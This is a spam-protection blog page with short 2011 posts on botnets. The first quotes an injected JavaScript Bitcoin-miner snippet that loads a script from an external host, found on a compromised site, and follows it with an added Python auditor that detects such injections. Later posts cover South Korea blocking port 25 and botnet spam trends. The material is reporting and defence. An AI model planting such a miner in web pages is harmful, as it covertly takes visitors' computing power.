Anti Spam Blog

Covering spam protection and email technology

botnets

Bitcoin Mining Coming to a Compromised Web Site Near You

December 12th, 2011 Posted in News, botnets

A poster to the Full Disclosure mailing list announced today that he had discovered JavaScript-based Bitcoin mining software on a compromised web site. Here’s the original post for reference:

Group,
Recently I ran across the below on a site:

<script type="text/javascript" src="hxxp://www.bitcoinplus.com/js/miner.js">
</script>
<script type="text/javascript">// <![CDATA[
  BitcoinPlusMiner(10215318);
// ]]></script>

I know the 10215318 represents the bitcoin email, but I was curious if
there was a way to figure out what the email actually was instead of the
number above.  Would be nice to find out what email address may have been
involved in compromising the site.  Thanks for any help you may be able
to provide.

James

For those who are not in the know about Bitcoin, it suffices to say that Bitcoin provides a way of turning CPU cycles into cash. We’ve known for a while that botnet operators have been deploying Bitcoin mining programs onto compromised PCs. What is different about today’s report is that the mining requires no botnet installation: it happens when a visitor simply loads the web site and the browser runs its JavaScript code, which it does automatically.

For a cybercriminal, the idea of deploying a bit of JavaScript onto a compromised web site and then monetizing millions of spare cycles of CPU time from web site visitors must evoke something close to a religious experience. Is it time for our web browsers to police JavaScript CPU consumption more aggressively?
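
As an added example (not part of the original post or the Full Disclosure message), here is one way a site owner could audit pages for an injection like the one quoted above: it flags script tags that load from hosts outside an allowlist, and inline BitcoinPlusMiner(...) calls. The allowlist host www.example.org and the names ScriptAudit and audit_html are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from (constructed).
ALLOWED_SCRIPT_HOSTS = {"www.example.org"}
# Inline call shape taken from the quoted snippet: BitcoinPlusMiner(<number>)
MINER_CALL = re.compile(r"\bBitcoinPlusMiner\s*\(\s*(\d+)\s*\)")

class ScriptAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._buf = None  # inline script text while inside <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._buf = []
        src = dict(attrs).get("src")
        if src:
            # Read defanged "hxxp" as "http" so quoted samples parse too.
            url = re.sub(r"^hxxp", "http", src.strip(), flags=re.I)
            host = (urlparse(url).hostname or "").lower()
            if host and host not in ALLOWED_SCRIPT_HOSTS:
                self.findings.append(("external-script", host))

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            for m in MINER_CALL.finditer("".join(self._buf)):
                self.findings.append(("miner-call", m.group(1)))
            self._buf = None

def audit_html(html):
    parser = ScriptAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page embedding the snippet quoted in the post.
SAMPLE = """<script src="http://www.example.org/js/site.js"></script>
<script type="text/javascript" src="hxxp://www.bitcoinplus.com/js/miner.js">
</script>
<script type="text/javascript">// <![CDATA[
  BitcoinPlusMiner(10215318);
// ]]></script>"""
```

Calling audit_html(SAMPLE) returns a list of (kind, value) findings; relative script paths such as /js/local.js have no host and are not flagged.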

South Korea to Block Port 25

November 16th, 2011 Posted in News, botnets, outbound spam


Last week, according to the BBC, South Korea’s Internet and Security Agency began encouraging ISPs to block port 25 to limit the quantity of botnet spam emanating from the country. South Korea has long had a reputation as a haven for botnet spam, most likely because of the large number of Internet users in the country, and the extremely high quality and low cost of their broadband access. The recommendation to block port 25 will probably improve things in South Korea, if the ISPs get around to implementing this change. I’m not sure how influential the regulator is in that country, but if it’s like other developed countries, the ISPs are likely to drag their feet to avoid affecting users negatively.


Botnet spam ticks up in August

August 29th, 2011 Posted in botnets, outbound spam

Latest monthly botnet spam graph from cbl.abuseat.org

After a very quiet summer, it seems that the spam bots have awakened. We recently noticed a spike in blacklistings; after checking the usual data sources, it seems the spike is widespread and indicative of one or more spambot networks getting back into action. The graph above is from the CBL (source: cbl.abuseat.org), which is one of the world’s better botnet blacklists.

Is this another “back to school special” as we have seen in previous years, where the spammers go to sleep over the summer, only to turn their machines back on in time for mom and dad to come home from vacation (and start buying pills)?

Despite the recent uptick, botnet spam volume is still well below the peak in early 2010, which was as much as 6 times higher than present volumes.